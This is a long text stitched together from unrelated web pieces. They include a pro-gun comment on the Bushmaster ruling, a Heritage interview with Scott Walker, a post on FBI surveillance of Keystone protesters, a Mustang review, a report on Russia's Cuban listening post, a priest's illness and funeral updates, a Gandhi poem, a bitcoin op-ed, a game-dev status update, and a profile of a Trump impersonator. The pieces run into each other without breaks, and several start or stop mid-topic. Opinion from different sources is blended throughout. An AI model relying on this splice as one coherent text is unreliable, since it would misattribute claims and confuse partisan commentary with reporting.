Hopefully this spells the end of this ill conceived attempt at using a tragedy to try to bring down the gun industry. I had my doubts about how Judge Bellis might handle this initially, but her ruling in this case wound up providing the clarity that was needed. The PLCAA is clear in both its wording and intent. When a properly functioning, legal firearm is used by a bad actor to commit crimes but was not knowingly sold to them by the manufacturer or a distributor, the manufacturer is not liable for those actions. In this case, the guns were legally sold to the shooter's mother who followed all the rules. The shooter stole the weapons from her to commit his crimes. The chain of production, delivery and ownership was broken, so Bushmaster was not at fault.
If there's anything remarkable about this ruling it's only that it took so long to reach this point. The conclusion should have been obvious from the moment the case was first submitted. A more vindictive person might argue that the plaintiffs should be held liable for all the court costs incurred by Bushmaster, but given the emotional entanglements surrounding the case I somehow doubt that's going to happen.
MADISON, Wis. — Teachers' unions and representatives of every liberal interest group in the country may have taken over the streets of Madison for demonstrations, marches and speeches, but inside the Wisconsin governor's mansion its chief tenant remains calm and resolute. The Badger State's budget will be balanced, Gov. Scott Walker (R) assured The Heritage Foundation in a one-on-one interview. The stakes in Wisconsin are high not just here, but across America.
“I've said all along the protesters have every right to be there, but I'm not going to let tens of thousands overload or overshadow the millions of people in Wisconsin, the taxpayers of the state, who want us to do the right thing and balance the budget,” Gov. Walker told us. (Click here to watch the interview.)
Fourteen state Senate Democrats fled to Illinois last week, preventing a quorum and blocking passage of Walker's budget repair bill. But that doesn't dissuade Gov. Walker. He told Heritage he would prefer to see the stalemate last indefinitely rather than compromise on his principles.
For the strength to stand so firmly, Gov. Walker said he draws on his past experience as Milwaukee County executive—a fiscal conservative leading a county that voted overwhelmingly for President Obama in 2008 by a margin of 67% to 32%.
The political role model Gov. Walker looks up to is also important, as it is none other than President Ronald Reagan. Of Reagan, Gov. Walker said, “He knew who he was, he knew where he was going and he did what he had to do to get there.”
Reagan was no stranger to bold and difficult decisions, and Gov. Walker said he was prepared to follow in the former president's footsteps for as long as he served in office.
In 1981, about six months after taking office, Reagan defined the tenor of his administration with his own bold decision to fire more than 11,000 air traffic controllers who ignored the president's orders to return to work. Reagan emerged victorious, his presidency emboldened by the conflict.
The stakes were high for Reagan then—he risked an enormous public backlash by disrupting commercial air travel—and they're high for Gov. Walker now. In many ways, Wisconsin will be the prototype for other deficit-laden states whose leaders attempt to balance their budgets.
Gov. Walker is aware of just what Wisconsin—and the rest of the country—stands to gain or lose with the ultimate outcome of this debate. That's precisely why he insists the outcome be a balanced budget. For that, he'll endure personal insults, the comparisons to deposed Egyptian leader Hosni Mubarak and Nazi dictator Adolf Hitler. He'll face days of chanting outside his window and threats to his safety.
In fact, Gov. Walker is not merely enduring—he's “feeling good,” he said. He's even found something in common with the protesters: They share the same taste in music. The songs blaring over the loudspeaker take him back to his college and high school days.
The music's not the only aspect of the protests Gov. Walker appreciates. He's also grateful they've remained peaceful—even this weekend, when his supporters turned up to counter the protesters. Maybe that's why Gov. Walker seems so grounded even in the midst of the churning: He's appreciative of, rather than worried about, what the protests signify—that the people of Madison, those on both sides of the issue, care enough to come to the Capitol to debate.
But that's where he draws the line, promising to remain committed to his principles in the face of adversity. “We have to be clear and realistic about our challenges,” he said, “but optimistic about our solutions.”
Quick Hits:
FBI Spied On Activists Because Protecting Corporate Interests Is Roughly Equivalent To Ensuring National Security
from the our-disregarded-internal-policies-trump-your-First-Amendment-rights dept
That whole thing about the FBI not surveilling people based solely on First Amendment activity? The thing that's been in all the (FISA) papers (and agency policies)? Yeah, the FBI hasn't heard of it either.
The FBI breached its own internal rules when it spied on campaigners against the Keystone XL pipeline, failing to get approval before it cultivated informants and opened files on individuals protesting against the construction of the pipeline in Texas, documents reveal.
Internal agency documents show for the first time how FBI agents have been closely monitoring anti-Keystone activists, in violation of guidelines designed to prevent the agency from becoming unduly involved in sensitive political issues.
“Many of these extremists believe the debates over pollution, protection of wildlife, safety, and property rights have been overshadowed by the promise of jobs and cheaper oil prices,” the FBI document states.
“The Keystone pipeline, as part of the oil and natural gas industry, is vital to the security and economy of the United States.”
[T]he partially redacted documents reveal the investigation into anti-Keystone activists occurred without prior approval of the top lawyer and senior agent in the Houston field office, a stipulation laid down in rules provided by the attorney general.
Confronted by evidence contained in the cache of documents, the agency admitted that “FBI approval levels required by internal policy were not initially obtained” for the investigation, but said the failure was remedied and later reported internally.
“It is clearly troubling that these documents suggest the FBI interprets its national security mandate as protecting private industry from political criticism,” he said.
"Unduly involved" is right. First of all, a majority of what was monitored was First Amendment activity, something no federal intelligence or investigative agency is supposed to be doing. Certainly, there can be law enforcement monitoring of protests as they occur, but there's no provision in the law that allows the FBI to monitor peoplebecause of their activism.Unless, of course, these activists are declared "extremists." Then all bets (and Constitutional protections) are off."Extremists" are often mentioned in the same breath as "domestic terrorists," so with a little bit of rebranding, the FBI is now able to surveill peoplefor their First Amendment-protected activities. That's handy and not totally unexpected, given the agency's long history of eyeballing activists who run contrary to its view on How Things Should Be. At one point, it was uppity blacks and encroaching homosexuals . Now, it's people who don't want an oil pipeline running through their neighborhoods.And, even though we know the FBI has clearly taken a stance on controversial issues in the past and shaped its surveillance activities accordingly, it's rather jarring to see anagency decide who's right and wrong by issuing a statement (wrapped in a self-justifying plan of action) on behalf of one side of the issue.Having decided that protecting corporate interests was roughly aligned with its "national security" purview, agents then routed around any internal controls that might have restricted its plans to break FBI policy.But, hey, no problem because the FBI totally fixed things in-house and in post.The supposed extremists it monitored the longest were part of an organization known as the Tar Sands Blockade, a group committed to nonviolent protest. While minor crimes such as trespassing were committed by members of the group, nothing rose to the level of what one would normally associate with an FBI investigation. And it went on for 11 monthsthe "error" that allowed the investigation to exist in the first place was discovered.Mike German, former FBI agent and fellow at the Brennan Center for Justice lays out the obvious problem with the FBI's behavior:That is troubling. Just as troubling is the agency's determination that the surveillance it never should have initiated resulted in no "adverse effects." But for whom? Obviously, the FBI walked away from this with little more than another dent in its now-heavily damaged reputation. But what about those who were surveilled? Or those who might be in the future when they exercise their First Amendment rights? The FBI's self-assessment doesn't factor in these consequences and because it doesn't, it will likely make the same (intentional) "mistakes" in the future.
Filed Under: activists, corporate interests, doj, fbi, first amendment, keystone, surveillance
DAMASCUS, Md. (MarketWatch) -- It is one of Ford's more popular colors -- the Grabber Blue that this weekend's test car, the 2010 Mustang GT, showed off to the world. While the brilliant blue turns heads wherever you go, the wonderful V-8 will grab the attention of those who like to drive.
The 4.6 liter delivers 315 horsepower at 6,000 rpm and 325 lb-ft of torque at 4,250 rpm. Not only will this propel the Mustang from a dead stop to 60 in the five-second range, it makes music to the ears of virtually any driver. It rumbles, as an All-American 8 should. In the engine world, when cranked up, this is the equivalent of two combined symphony orchestras extracting every note of the William Tell Overture. (This Mustang would make Tonto forget about Scout forever.)
The slick shifting five-speed manual was always a delight, but with the power on tap it really did not need that much attention. Back roads were a hoot in third and fourth gear. On the interstates, engaging fifth calmed that big puppy under the hood, so long-distance travel was a most pleasant proposition.
On the subject of engines, Ford will introduce a new six for the Mustang in model year 2011. This will replace the rather truck-like six in the current model, with the possibility of up to 30 miles per gallon in highway driving.
The 3.7 liter, all-aluminum engine will crank out 305 horsepower and 280 lb-ft of torque, according to Ford. Also on tap will be two new transmissions, including a six-speed automatic. Ford claims the red line is a healthy 7,000 rpm. It will take the wraps off this new six at the Los Angeles Auto Show.
It strikes me, perhaps, that we are ever so slowly seeing the end of the V-8. Upcoming pollution and EPA gas-mileage rules may be easing that wonderful invention out the door. I recently tested two Cadillacs and both had sixes. The first thing that came to mind is that not that many years ago there would have been a hulking V-8 under that hood. Yet I never missed them.
Cars are getting lighter with all the new materials, and more nimble too. At this juncture, I was supposed to wail about Ford and its continued use of a solid rear axle in the Mustang. However, some very smart engineers have obviously taken out their whips and chains and tamed that old rear end.
You see, this car really hangs in there in the twisties, and will outperform its two rivals on the skid pad. The handling of the 'Stang was outstanding for such an old design and the ride was not bad either. It would never upset your Aunt Grace, assuming she ever consents to ride with you in it.
Jazzy interior
Inside the 2010 Mustang is most comfortable, but let me point out what I consider the most outstanding two features. There were two knobs that controlled the audio system and two for the ventilation.
There was no going through a complex series of carpel tunnel-inducing buttons and menus. You want to turn the radio on, you twist the knob on the left side. What miraculous stuff.
For 2010 Ford jazzed up the interior with some nice trim, the instruments are easy to read, and the cue ball shifter knob came readily to hand. Two humans will not fit in the back.
On the final test drive, the outside temperature rose to a crispy 56 degrees and it was time (for the first time), to put the top down. With the windows up, there was little wind noise, and I didn't have to crank up the heater or bun warmers. So for the final 40 miles home, I pretended it was July and loved every inch of the trip.
There was shake when certain kinds of bumps were hit, sending the inside rearview mirror into a nervous fit, so perhaps a bit more shoring up of the body is in order.
With "Premier" trim, a security package, the heated seats, 19" aluminum wheels, and a rear video camera, the test convertible would go for $39,710. While that is a chunk of change, remember its rivals do not come as convertibles yet.
With its improved interior, quiet running on the interstates, quick acceleration anywhere, and a wonderful roar just a flick of your right foot away, it is easy to fall in love with this veteran of the Pony Car wars.
And a war it could be. With Ford's upcoming six, and the good chance (I would think) of a more powerful eight, the Mustang should have the Camaro and Challenger crowd scratching their sideburns.
Having now sampled all three of the Pony Cars, which one would I add to the home driveway? If I were buying strictly on emotional tugs, it would be the Challenger R/T. As a total package, this one really talked to me. However, one wonders about the future of this model.
The Mustang would be less than a hoof beat behind, and certainly, it is hard to overlook the sexy design of the Camaro. If GM put a new interior in it, the pick would get even harder.
Hubcaps
Russia to reopen electronic listening command post in Cuba
July 17, 2014 by Joseph Fitsanakis
By JOSEPH FITSANAKIS | intelNews.org
The government of the Russian Federation has reached an agreement with the authorities in Cuba to reopen an electronic communications listening base that was built by the Soviets during the Cold War. Russian newspaper Kommersant said on Wednesday that the agreement between the two nations was struck late last week during a visit to the communist-run island by Russian President Vladimir Putin. The agreement centers on the Lourdes signals intelligence (SIGINT) facility, located just outside Cuban capital Havana. Situated approximately 100 miles from the United States mainland, the facility was used throughout the last two decades of the Cold War to provide intelligence for Soviet military and civilian spy agencies, while also operating as an overseas communications hub for the Soviet Navy. It was regarded at the time as the most formidable Soviet electronic listening post located anywhere outside Soviet territory. Cuban authorities once bragged that Lourdes provided Moscow with 75 percent of its actionable intelligence on its American adversary —though some experts consider the statement an exaggeration. At its peak, in the late 1970s, Lourdes hosted approximately 3,000 technical specialists and support personnel, over half of whom were Soviet. Initially, the Cuban government permitted Moscow to make use of Lourdes free of charge. However, in 1992 Havana introduced an annual rental fee, which by 2001 had risen to $200 million. Under the bilateral agreement, Russia was paying the rental fee in kind, by supplying the Cuban government with food products and fuel, as well as military equipment. But in 2001, the administration of President Putin withdrew from the agreement, citing the high cost of maintaining the base. Moscow said at the time that it was financially impossible to keep up a SIGINT complex located 6 thousand miles away from Moscow. Some observers speculated at the time that Moscow's decision to close down the listening post was part of a broader rapprochement with Washington, sparked by the events of 9/11. However, according to Kommersant, Russia and Cuba began exploring the possibility of reopening Lourdes “a few years ago”, but only reached a final deal last Friday, when “a framework agreement was signed” by the two sides. The Moscow-based daily added that improvements in signals collection technology meant that Lourdes could now operate at a much-reduced cost to Moscow, since fewer technicians would need to be permanently stationed there.
Advertisements
The servant of God Fr. Peter E. Gillquist departed this life at 9:20 p.m. on July 1, 2012, surrounded by family. He has finished the race. Memory eternal!
July 7, 2012
Last evening ended three days of services culminating in Fr. Peter's burial at All Saints Orthodox Cemetery in Bloomington, IN. His Grace Bp. Anthony, who presided at the funeral service, delivered an inspiring, engaging and memorable eulogy. Fr. Gordon Walker preached a truly evangelistic homily at the preceding Divine Liturgy. The Audio for both, and Fr. Jon Braun's tribute, can be found at Ancient Faith Radio (http://ancientfaith.com/specials/fr._peter_gillquist_memorial). Below you will see the tri-fold sunbeams caught on film by one of the faithful at the funeral service.
We will post more photos as they become available.
We are moved by your outpouring of love. Thank you for your kind words and sincere prayers!
+++
In lieu of flowers it is requested that memorial donations be made payable to All Saints Church (6004 So. Fairfax Rd, Bloomington, IN 47401). Funds will be split between the building funds of All Saints Church, Bloomington, Indiana, and St. Athanasius Church, Santa Barbara, California — Fr. Peter's two “home parishes.”
Schedule of Services for Fr. Peter E. Gillquist – July 4-6, 2012
Wednesday, July 4
6:00 p.m. Public Visitation at All Saints in Bloomington
7:00 p.m. Trisagion Service
*All Night Vigil to Follow* (Reading of the Psalter)
Thursday, July 5
9:00 a.m. Divine Liturgy in Bloomington (Followed by transport to Carmel, IN)
5:00 p.m. Public Visitation at Holy Trinity Greek Orthodox Church (3500 W 106th St. Carmel, IN)
7:00 p.m. Trisagion Service
*All Night Vigil to Follow* (Reading of the Psalter)
Friday, July 6
9:00 a.m. Divine Liturgy (His Grace Bishop Anthony Presiding)
11:00 a.m. Funeral Service followed by Mercy Meal at Holy Trinity GOC
3:30 p.m. Burial Service at All Saints Cemetery in Bloomington
Accommodations near Holy Trinity Church, Indianapolis/Carmel
The following hotels currently have rooms available for Thursday night, July 5.
Jamieson Inn
10201 N. Meridian Street
Indianapolis, IN 46280
(317) 816-1616
Mention “$69 funeral rate”
Courtyard Marriott
10290 N. Meridian Street
Indianapolis, IN 46290
(317) 571-1110
Mention “Fr. Peter Gillquist” to get special $79 rate
Embassy Suites Indianapolis – North
3912 Vincennes Rd.
Indianapolis, IN 46268
(317) 872-7700
$119 king room
$139 two queen beds
Drury Hotel
9310 N. Michigan Road
Indianapolis, IN 46268
(317) 876-9777
$87 for King or double
June 10, 2012
In 1999, Fr. Peter E. Gillquist (retired and attached to All Saints) was diagnosed with stage 3 melanoma. Miraculously, he survived through the grace of God, the prayers of the saints, and the care of physicians. His prayer was to be given more time to assist in starting more mission churches, and to grow old with his wife, Khouria Marilyn.
Now, 13 years later, he has again been diagnosed with melanoma — only now stage 4. We are awaiting further word on a prognosis and possible treatment options. Scroll down to see any updates posted on this page. God bless you.
***For Immediate Release***
June 14, 2012…
The Very Rev. Fr. Peter E. Gillquist has been diagnosed with stage 4 metastatic melanoma. Fr. Peter survived a diagnosis of stage 3 melanoma in 1999 and another bout in 2010. He, Kh. Marilyn, and family await test results to determine treatment options in the management of this aggressive cancer.
The Gillquists request your prayers as they continue a lifelong journey of faith in the Great Physician, remembering that our communal prayer is for the healing of soul and body, and in the Lord's time, a Christian ending to life, that is painless, blameless and peaceful.
Fr. Peter retired from 25 years of service to the Antiochian Archdiocese as Director of the Department of Missions and Evangelism in January. He is attached to All Saints Antiochian Orthodox Church in Bloomington, Indiana, where his son, Fr. Peter Jon, serves as pastor.
June 19, 2012
Fr. Peter is in the hospital tonight with a fever. His physician felt it would be the best place for him to receive care as the doctors search for a possible infection causing this elevated temperature. Thank you for your continued prayers.
June 20, 2012
Fr. Peter is still in the hospital. During tests early this morning to determine the cause of his fever, it was discovered that his cancer is moving even more quickly than anticipated, and has spread to some of his vital organs. Fr. Peter's children are travelling now to be with him and Kh. Marilyn. Your prayers for their safe travel, and for Fr. Peter and Kh. Marilyn's continued peace during this time of illness are appreciated.
June 22, 2012
Our family shared a special time in the hospital room with Fr. Peter this morning, reading aloud your kind words of encouragement which have been posted on this site. Thank you for your continued prayerful support.
June 24, 2012
Fr. Peter is still in the hospital, surrounded by his wife, children, and a grandchild who is carrying his first great-grandchild. More family will be en route to Bloomington throughout the week.
We discovered today that reading your posts is not only encouraging to Fr. Peter, but also a helpful diversion from his physical pain.
As will happen, it seems there is some mis-information being circulated on the internet regarding Fr. Peter's condition. Please always refer to this site for up-to-date and accurate information from those at his bedside.
June 25, 2012
We have been anticipating test results regarding possible treatment options, and today we received news that no cancer treatment would be of positive effect in Fr. Peter's case. Therefore, the emphasis of his care is on pain management and prayer, so we are working on both. Fr. Peter, Kh. Marilyn, and their children are strengthened through your prayers.
June 27. 2012
Fr. Peter is sleeping more and more each day. He will be transferred to a hospice facility this afternoon, where his family will continue to participate in his care and comfort management, together with a 24-hour nursing staff. Your continued prayers for a peaceful journey are appreciated more than you know.
June 29, 2012 – The Feast of Saints Peter and Paul
Blessed feast day, dad. Fr. Peter has been in a hospice facility since Wednesday afternoon. When our family first heard about a hospice house, we were unsure what to expect. What we have found has been a blessing beyond what we can express: a large living room with couches and a kitchenette, a smaller, intimate sitting room, a chapel, a sizible outdoor deck, and eight large bedrooms, most of which look out into the woods. Currently, only half of the rooms are occupied by patients. At the foot of Fr. Peter's bed is a four foot wooden shelf, which holds icons of Christ, the Theotokos, St. Peter the Apostle, St. Nectarios, and many of the holy unmercinaries. Vigil lamps burn around the clock, and at least one family member is with Fr. Peter at all times.
Presently, Fr. Peter sleeps most of the day. When he is awake, he asks for prayer. The family gathers to pray and sing, and he sings with us. These are the things we will remember all our lives.
The prayers you offer and the words you post here are such a source of encouragement to all of us. Thank you for your love and support as we continue this journey together.
July 1, 2012 – Saints Cosmos and Damian
These are holy days. God is so merciful, loving, and compassionate.
After the Liturgy of Ss. Peter and Paul Thursday night, Fr. Peter asked for prayer at the Hospice House. Fr. Peter Jon arrived around 10 p.m. and asked, “Dad, would you like to receive communion tonight or tomorrow?” Fr. Peter stated clearly that he would like communion right away, so we began to pray and sing. Although it was becoming increasingly difficult for him to speak in complete sentences, Fr. Peter recited all the prayers by heart and sang perfect harmony with the communion hymns. Then he went to sleep. That is the last food he has consumed — the Bread of Life, and thr Fountain of Immortality.
Fr. Peter didn't awaken again until the following evening at 9:00 p.m. (Friday), when the wheels of Fr. Gordon Walker's car hit the driveway. Fr. Gordon had driven six hours to be with his friend of 50 years in his time of need. They talked a while, smiled a lot, and then Fr. Peter went back to sleep following evening prayers.
The following morning (Saturday), we all gathered in Fr. Peter's room for morning prayers, as he slept. Around 3:00 p.m., Fr. Peter awoke and asked if Fr. Gordon would hear his confession, which he did. Then a call was placed to Fr. Jon Braun, and the three old friends shared a few minutes together, talking about heaven. Then Fr. Peter fell asleep again.
Since that time, his vitals have changed dramatically, and he appears to be making the final sprint for the finish line. “Finish the race” is what his family members whisper in his ear. We are gathered by his bedside in prayer, Scripture-reading, and song. Finish the race, dad. We love you so much.
July 1, 2012
The servant of God Fr. Peter E. Gillquist departed this life at 9:20 p.m. surrounded by family. He has finished the race. Memory eternal!
“Christ is risen from the dead, trampling down death by death, and upon those in the tombs bestowing life!”
Funeral arrangements will post tomorrow morning.
I need you again Gandhi, how could i explain? Please change the politics for me!
You said, "you must be the change, you want to see in the world."
Yes Gandhi, I remember it exactly. The words are simple, the line is perfect and the quote is immaculate! But the responsibility you had assigned to me is quite a task.
Your quote makes every Indian youth inquisitive about change, but to ‘be'the change, you had talked about, is a real challenge. The thought of allegiance to change makes me question not just my ability, but also the possibility of its perilous consequences on my career. My ability has no courage nor can I cajole anyone to contend. It is impossible for my imagination to enumerate those changes. But is it really possible for anyone at all to impact a change of your imagination? I don't think so. I need a society, a better society, for me, my family and my friends to live in. Is it unreasonable to dream about it or is it unfair to demand it?
What would you have done, if you were alive today? What changes would you have wished for? And where would you have started?
Where would you have started?
Would you have started by closing the manhole in the street? or
Would you have started by covering the pothole on the road?
Would you have started by teaching the beggar en route? or
Would you have started by confronting the political leader of your state?
Whom would you have protected first?
The creative kid, from the clutches of malnutrition, or
The innocent dame, from the tangles of a rapist
The industrious taxpayer, from the greedy legislative member, or
The illiterate labour, from the callous industrialist
What would you have improved next?
The beautiful countryside, from utter poverty, or
The busy metro road, from sick pollution
The brilliant common man, from under-employment, or
The growing citizen, from poor education
What would you have saved the most?
Indian media from corporate traits, or
Indian bureaucracy from corrupt officers, or
Indian democracy from divisive politics, or
Indian lifestyle from compromise and settle
I believe you would have dwelled on much bigger issues, beyond my ken. My vote has no power to bring the big change! And I do not really know where to start and how to change.
I need you again, Gandhi, the status quo is unsustainable
I need you again, Gandhi, to change this world for me
I need you again, Gandhi, how could I explain?
There's a new thing sweeping the international investment landscape. Its price is climbing the charts even faster than Taylor Swift's new album “Reputation,” which sold 1.2 million copies in its first week.
It makes the flying FANG stocks look as tame as Treasury bonds.
Of course I'm talking about bitcoin. Like it or loathe it, own it or wish you did, there is no denying that bitcoin is here and has attracted a huge following, from tech investors even to generally skeptical Wall Street types.
Last week, Nasdaq announced it will launch bitcoin futures in the first half of 2018. This follows a move by the CME, which announced two weeks ago that it will begin trading bitcoin futures this month and on Friday received approval for trading from the CFTC.
That's two bona fide US exchanges and one pre-eminent US regulator that will allow investors to bet on the rise and fall of bitcoin's price.
Never wanting to miss being behind the curve, Washington decision-makers are now paying attention, which actually has the potential to be a good development if they don't mess things up — something they have proven profoundly capable of (especially when they don't understand something).
Or perhaps they will want to add a bitcoin tax to balance things out with the deficit hawks.
Few things in life are as scary as the notion that “Washington will solve it.” Look no further than Social Security, or health care or student loans.
But change is in the air in DC. Politicians need to work with the US security exchanges like the Nasdaq and the CME to find a way to integrate with the global exchanges that will surely come online with bitcoin in short order.
While I am a big fan of the underlying blockchain technology with smart contracts and distributable ledger technology, bitcoin is a different story.
Although it is gaining acceptance, the cryptocurrency has the same scintillating sizzle without much substance that the internet had in its early days.
The real question for bitcoin investors is whether it will turn out to be an internet bubble in the fashion of AOL's “You've got mail” — in this case, “You've got billions.”
Our writing team is chugging along merrily, coming closer and closer to completing their scenes for Act 1, after which it'll be just a matter of polish. As it stands, I'd estimate we have 60% of the first drafts for Act 1 scenes done. The editing process is only just beginning, and that remains a large chunk of work. The outline for Act 1 is complete however, so it's just a matter of getting all the scenes written up and polished.
On the art side of things, the art team is moving along slowly but surely. The sprite production process looks to be a fairly long one, with several stages of iteration and refinement so making a real declaration of progress isn't too easy. Little is finalized in terms of art assets, our artists are still experimenting with character designs, something I expect to continue for quite awhile.
Music production has been a bit slow. We have a fair few drafts for character themes and general music, but little in the way of polished work. Getting the right feel for each character is a tricky business, and I don't expect character music to become finalized any time soon. Regardless, it's still very interesting to watch our talented musicians refine their pieces.
And so, that's a brief overview of where the project stands at the moment. Going forward we're hoping to hammer out some organizational issues to help speed production along and we'll no doubt be busy in the near future. Thanks to everyone interested enough to check in.
My client Tom* was at work when the police turned up. They served him with an intervention order, took him home and told him to pack a suitcase. If he returned home, or contacted his wife or children, he'd be facing two years' jail. He'd had no inkling this was coming.
The order was an interim one, granted ex parte. That means the court issued it in his absence, having heard only his wife's side of the story.
Intervention orders do more than just restrain violence. Often they separate a man from his children, evict him from his home and deprive him of his property. Credit:Craig Sillitoe
In theory, Tom could go to court and argue his case, but a hearing date was months away. With his wife now in sole possession of the family home, her lawyers came on heavy about a divorce and a property settlement. They hinted that if he played ball, he could start seeing his kids again.
As is often the case, the intervention order was just a tactic in family law proceedings. It's not what intervention orders are intended for, but delays in getting court time mean ploys such as this are common. Magistrates' courts are so swamped with these cases, the parties wait months for a hearing.
Ayman Odeh, head of the Joint List, an alliance of four small Arab-backed parties, casts his ballot in Haifa, Israel, accompanied by his family on Tuesday, March 17, 2015. (AP Photo/Mahmoud Illean)
Israelis went to the polls on Tuesday to elect a new government, and the country's incumbent leader was very worried.
Over the past few months, Prime Minister Benjamin Netanyahu saw what some assumed would be a comfortable reelection morph into a tightly contested race. In the final days ahead of the vote, Netanyahu's rhetoric grew increasingly hawkish, even for his standards. On Monday, he declared there would be no independent Palestinian state under his watch. And on Tuesday, as Israelis cast their ballots, he sounded the alarm about who was voting.
"The right-wing government is in danger," Netanyahu wrote in a Facebook post. "Arab voters are coming out in droves to the polls. Left-wing organizations are busing them out."
Netanyahu then made his appeal on behalf of his rightist Likud party, which is trailing the Zionist Union, led by Labor Party leader Isaac Herzog: "Get out to vote, bring your friends and family, vote Likud in order to close the gap between us and Labor."
Some 20 percent of eligible voters in Israel are Palestinians, also referred to as Israeli Arabs. In recent elections, many have opted to boycott the polls in protest of the Israeli political status quo and the continued Israeli occupation of the West Bank and blockade of Gaza. But this year, a coalition of Arab parties opted to run on a joint ticket and stands to become the third-largest bloc in the Israeli Knesset, or parliament.
It's a bit unclear how the seats won by the Joint List, as the alliance of Arab parties is called, will play into the calculations of a future Israeli coalition government -- they will not partner either with a Herzog or Netanyahu government. Ultimately, a large number of Arab-held seats would worsen Netanyahu's chances of building a majority.
It's also unclear whether Netnayahu's claims on Tuesday morning about a surge in Arab voters was even true. Some observers suggested that Arab voting trends this year were consistent with previous elections.
Whatever the case, it's startling when a sitting prime minister laments high voter turnout, and another sign of Netanyahu's desperation. Avigdor Lieberman, Netanyahu's foreign minister and the head of the Yisrael Beitenu party, echoed the fears of his boss in a tweet, saying, "Netanyahu also knows that if the Arabs are voting in droves, only a strong Lieberman can stop them." Lieberman, known for his strident anti-Arab rhetoric, said last week that "disloyal" Israeli Arabs should be beheaded.
Critics on social media condemned the Israeli prime minister's racial scare tactics, which spawned a few satirical memes.
THE ARABS ARE VOTING!! THE ARABS ARE VOTING!! pic.twitter.com/70YjUpwXUP — Hebron James (@HebronJames) March 17, 2015
Netanayhu "is inciting against Arab voters who are taking advantage of their natural and democratic right as citizens," said Israeli Arab politician Ahmed Tibi. "Netanyahu and Likud are afraid, and therefore, I call on more and more of the Arab public to go to the polls so Netanyahu will continue panicking. Change is coming."
Related links
John Di Domenico grew up idolizing Trump. Now he pretends to be him for a living.
Gigi Pena
As soon as John Di Domenico puts on the wig, his whole chest seems to inflate. He smoothes the wispy nape hairs, pats down the orange shelf of bangs. Normally his posture is shuffling, his shoulders bent. But as soon as he plunks on that wig, his stance opens. Suddenly he faces you down like a wrestler; suddenly he fills every room he enters. After he glues the sideburns to his head, Di Domenico squints at his face in the mirror and purses his lips. “You're a loser,” he tells his reflection. “You're fired.”
Di Domenico has been a professional Donald Trump impersonator for more than a decade now, but getting ready still takes him about an hour. That tailor-made Trump wig, which cost $4,000, has to be carefully tidied and groomed. He contours his nose to narrow it. He deepens his smile lines with pencil. He is several inches shorter than Trump, so he slips on shoes with lifts to elevate him. He even wears special undershirts with a higher thread count—“three for $42!” he laments—just so he can feel extra prosperous.
The $4,000 tailor-made Trump wig.
Laura Bennett
These days, Di Domenico plays Trump three to four times a week. He goes to corporate team-building events to roast company executives, and gets hired for private parties to schmooze with guests. That evening, we were in his hotel room in Chelsea the night before he'd be interviewed for an A&E biopic about Trump. He'd been flown in from Las Vegas, where he lives, for the occasion. “I just feel so lucky,” he says. “This is what I've always wanted.”
Di Domenico grew up in Ambler, Pennsylvania, in a row house in a working-class neighborhood. His father was a steelworker and World War II vet; his mother was a homemaker and a waitress. He always loved comedy, gorging on Monty Python and SNL sketches, but his other obsession was business. In high school, he started reading Success magazine. “I was like, wow, there's this other life,” he recalls. “There's a place where you don't have to worry about how much electricity you're using in your house, and how you are going to feed five mouths.” Trump seemed to Di Domenico to be the embodiment of that other life. “I was in love with the idea of New York,” Di Domenico says. “And here was this guy basically saying, I'm the unofficial mayor of New York. He's building buildings, and renovating classic hotels. It was just inspiring.”
A few years after college, Di Domenico finally moved to Manhattan. But then a bad real estate deal left him nearly broke. “New York chewed me up and spit me out,” he says. Eventually he moved to Vegas. In 1999—while appearing in a production of Tony n' Tina's Wedding at Trump Hotel in Atlantic City—he was roaming the halls when a man strode by, flanked by bodyguards and gesturing expansively: Trump. Di Domenico wandered around the gilded lobby, marveling at the giant marquee on the outside of the hotel that spelled out its owner's name. “This whole place,” Di Domenico remembers thinking. “It's his.”
The first time he got a call asking if he could play Trump was in 2004. He had impressions in his repertoire of Groucho Marx and Charlie Chaplin and Austin Powers, but he'd never attempted Donald. The gig was to record the voice of “Donald Trump” for an Apprentice-themed game at Trump Taj Mahal. He was daunted. “I was determined to really get him right, to really honor him,” he says. To research, he spent an entire weekend watching The Apprentice. He studied the nasal placement, the accent, the vocal patterns. “Most actors speak from their chest, but with Trump, it's the weirdest thing—he speaks from his teeth,” Di Domenico says. To demonstrate, he pointed to his own mouth, flaring his lips like a horse mid-whinny: “Huuuuuge.”
That 2004 voiceover was a career turning point for him. From then on, he began playing Trump regularly. When Trump toyed publically with a 2012 presidential campaign, work spiked. Di Domenico even went on a national comedy tour, staging fake debates with an Obama impersonator and a Romney impersonator. But nothing had quite prepared him for this moment when Trump announced his 2016 run.
He still remembers the day. He was at home in Vegas, watching Trump on TV. “Oh my god,” he thought. Instantly, his Facebook blew up with messages. “You're set for life,” friends said. And as the months went on, the offers began rolling in. He was invited on Fox & Friends as Trump. He got hired to appear as Trump at Red Roof Inn's national sales meetings in Ft. Lauderdale. “I thought, if he can just make it to the first debate, I'll be in good shape for the fall,” Di Domenico recalls. “And then he crushed the first debate.” Even Trump's titanic gaffes only seemed to give Di Domenico more fodder. When he heard Trump say “the Mexican government is forcing their most unwanted people into the United States,” Di Domenico cringed, wondering if it was all finally over. But then he got a call from his agent saying that Apple Vacations, one of the largest agencies for travel to Mexico, wanted him to do a 30-minute routine at a company party “apologizing” for Trump's immigration comments. “See, they love me! The Mexican people love me!” he ad-libbed every time the crowd applauded.
Over the past decade, he's felt himself become Trumpier. “I'm much bolder than I used to be,” he explains. Still, he says: “I'm riddled with doubt, always looking back and looking in. This guy is plowing forward. When I'm playing him, I feel powerful.” During college, he interned for the late Democratic senator Arlen Specter, but all these years spent trying to force himself inside Trump's head have indoctrinated him. His dream ticket is Trump-Rubio. He finds himself more awestruck by Trump every year. “Over time, I've become more enamored with him as a person,” Di Domenico says, “because he just doesn't change.”
Now, before each gig, he tacks two life-sized photos of Trump to the glass, framing his own face in the mirror. Then, squinting, he sponges on the salmony foundation and tenderly combs his wig. Sometimes he plays “For the Love of Money” (“money money… money”) as he works. Sometimes he just listens to recordings of Trump's voice, those disembodied catchphrases looping like an incantation, over and over. He never gets tired of them. He murmurs every few lines along with Trump, not breaking eye contact with himself: “I've mastered the art of the deal.” “I'm having more fun than I've ever had.” “If you work hard, you can really hit it big.”
Along with numerous threads of conversation, a whole bunch of passwords and usernames are cached on the web due to a poorly-implemented feature in the realm of open source
Unless you have been living on a deserted island for the past 12 years, you've surely come across a mailing list – if not as active poster, at least as a fervent reader. Mailing list software is the cornerstone of various communities ranging from support websites to forum alternatives.
